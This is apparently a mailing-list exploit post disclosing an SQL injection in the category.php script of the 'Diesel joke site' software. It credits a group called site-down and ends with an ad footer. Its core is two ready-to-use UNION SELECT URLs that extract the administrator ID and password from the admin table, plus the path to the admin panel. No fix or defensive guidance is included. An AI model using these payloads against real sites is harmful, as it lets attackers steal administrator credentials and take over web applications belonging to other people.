Sql injection in Diesel joke site script

Sql injection in Diesel joke site

forum type : Diesel joke site
bug found by : black-code
team : site-down
type : Sql injection

####################################################
Sql injection in Diesel joke site

page : category.php

variable : id

####################################################
Exploits :

admin id:
http://www.example.com/path to joke 
script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,ai
d,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*

pass:
http://www.example.com/path to joke 
script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,ap
ass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%2
0admin/*

aid= admin id
apass= pass of the admin
####################################################

path to admin panel :

http://www.example.com/path to jokes/admin

#######################
emails:

black-cod3 (at) hotmail (dot) com [email concealed]  &  gamr-14 (at) hotmail (dot) com [email concealed]
#######################

All my respect to our friends , lezr.com , g123g.net

done .. peace

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/